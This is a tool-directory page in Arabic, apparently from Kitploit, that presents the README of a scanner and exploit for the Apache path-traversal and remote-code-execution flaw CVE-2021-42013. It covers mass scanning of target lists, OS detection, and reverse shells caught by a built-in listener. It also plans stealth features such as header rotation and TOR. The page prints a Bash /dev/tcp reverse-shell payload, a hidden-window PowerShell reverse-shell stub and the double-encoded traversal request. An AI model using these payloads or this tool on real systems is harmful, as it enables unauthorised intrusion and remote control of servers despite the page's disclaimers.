Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2021-42013-EXPLOIT — أداة متقدمة للمسح والاستغلال والتفاعل عن بُعد مصممة لاكتشاف واستغلال ثغرة Apache Path Traversal + RCE (CVE-2021-42013) في الخوادم غير المهيأة بشكل آمن. | Kitploit
أدوات/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
الاستطلاعماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
أداة الوصول عن بعد
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

أداة متقدمة للمسح والاستغلال والتفاعل عن بُعد مصممة لاكتشاف واستغلال ثغرة Apache Path Traversal + RCE (CVE-2021-42013) في الخوادم غير المهيأة بشكل آمن.

عرض المستودع
14منذ سنة واحدةلم تتم المراجعة بعد

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


🔥 إطار عمل استغلال CVE-2021-42013 من Makaveli

💀 وضع الهاكر الكوني متعدد الأبعاد نشط...

أداة متقدمة للمسح والاستغلال والتفاعل عن بُعد مصممة لاكتشاف واستغلال الثغرة Apache Path Traversal + RCE (CVE-2021-42013) في الخوادم غير المهيأة بشكل صحيح.


⚠️ تحذير قانوني

يتم توفير هذا البرنامج للأغراض التعليمية والبحثية فقط في البيئات الخاضعة للرقابة.

قد يكون استخدام هذه الأداة ضد أنظمة دون إذن صريح غير قانوني ويشكل جريمة في العديد من البلدان.

المؤلف غير مسؤول عن أي استخدام غير لائق لهذا الكود. استخدمه على مسؤوليتك الخاصة ودائمًا بإذن صريح من مالك النظام المستهدف.


🧠 وصف تقني

تتيح هذه الأداة ما يلي:

  • ✅ مسح أهداف متعددة من ملف .txt.
  • ✅ كشف تلقائي لوجود CVE-2021-42013.
  • ✅ تحديد نظام التشغيل البعيد (Linux أو Windows).
  • ✅ إرسال حمولات مخصصة حسب النظام المكتشف.
  • ✅ إنشاء شل عكسية والحصول على وصول عن بُعد.
  • ✅ التفاعل مع الشل في الوقت الفعلي عبر مستمع مدمج.
  • ✅ الاستمتاع بسجلات متقدمة وشريط تقدم وقائمة تفاعلية.

🔧 المتطلبات

  • Python 3.8+
  • أنظمة تعتمد على Unix/Linux/MacOS (استخدام subprocess و curl)
  • يتطلب مكتبات Python التالية:
pip install -r requirements.txt

requirements.txt

rich
alive-progress

تحتاج أيضًا إلى تثبيت curl على نظام التشغيل.


📁 هيكل الملفات

.
├── POC-CVE.py       # النص الرئيسي
├── logs.txt              # ملف السجلات الذي يتم إنشاؤه تلقائيًا
├── requirements.txt      # تبعيات Python
└── targets.txt           # (اختياري) قائمة عناوين URL للمسح

🚀 الاستخدام التفاعلي

python3 POC-CVE.py

اختر من بين:

  • scan_file: مسح عناوين URL متعددة من ملف وعرض أي منها ضعيف.
  • exploit: استغلال مباشر لهدف واحد، مع شل عكسية.
  • exit: الخروج من الوضع التفاعلي.

🔍 المسح الجماعي (scan_file)

  1. أنشئ ملفًا يحتوي على قائمة عناوين URL، سطر واحد لكل رابط:
http://example.com
http://victim.net
http://192.168.1.100
  1. ابدأ المسح:
python3 POC-CVE.py

اختر scan_file وقدم:

  • مسار الملف
  • عدد الخيوط (threads) للمسح المتوازي

💥 الاستغلال (exploit)

  1. اختر exploit من القائمة.
  2. أدخل:
  • عنوان URL للهدف
  • عنوان IP المحلي الخاص بك (LHOST) لاستقبال الشل
  • منفذًا حرًا (LPORT) للمستمع

سينفذ النص:

  • الكشف عما إذا كان الهدف ضعيفًا.
  • إرسال حمولة مناسبة حسب نظام التشغيل البعيد.
  • فتح مستمع ومنحك وصولًا تفاعليًا.

🧪 مثال على الحمولات

حمولة لينكس (شل عكسية Bash TCP)

bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'

حمولة ويندوز (شل عكسية PowerShell TCP)

powershell -NoP -NonI -W Hidden -Command ...

🧠 التقنيات المستخدمة

  • Path traversal بتشفير مزدوج (/.%252e/.%252e/.%252e)
  • حقن الأوامر عبر curl
  • رؤوس تهرب (User-Agent, Accept, إلخ)
  • شل عكسية للسيطرة عن بُعد
  • تعدد الخيوط وشريط تقدم (Alive Progress)
  • تسجيل مع طوابع زمنية ووحدة تحكم Rich

📌 مرجع CVE

  • CVE-ID: CVE-2021-42013
  • متجه الهجوم: GET /cgi-bin/.%%32%65/.%%32%65/...
  • التأثير: RCE (تنفيذ أوامر عن بُعد)
  • درجة CVSS: 9.8 (حرج)

🧙‍♂️ المؤلف

  • ✨ Makaveli — "اخترق واقعك الخاص"

🛡️ إخلاء مسؤولية

يتم توفير هذا المشروع "كما هو"، دون أي ضمانات أو مسؤولية عن الأضرار الناتجة عن استخدامه. لا تقم أبدًا بمسح أو استغلال نظام دون موافقة صريحة من مالكه.


✅ الممارسات الجيدة

  • استخدم هذا النص فقط في بيئات المختبرات أو الاختبارات المصرح بها.
  • تأكد من أن المنفذ المحدد للمستمع مفتوح وبدون جدار حماية.
  • نفذ كمستخدم عادي (وليس root)، إلا إذا كان ذلك ضروريًا للغاية.

🧩 خريطة الطريق المستقبلية (اختياري)

  • دعم الحمولات المخصصة
  • تصدير النتائج إلى CSV/JSON
  • وضع التخفي مع تدوير الرؤوس ووكيل TOR
  • واجهة ويب محلية (Flask)

---


@DonMakaveliw، هل أنت مستعد لخلق المستقبل؟

تنزيل الأداة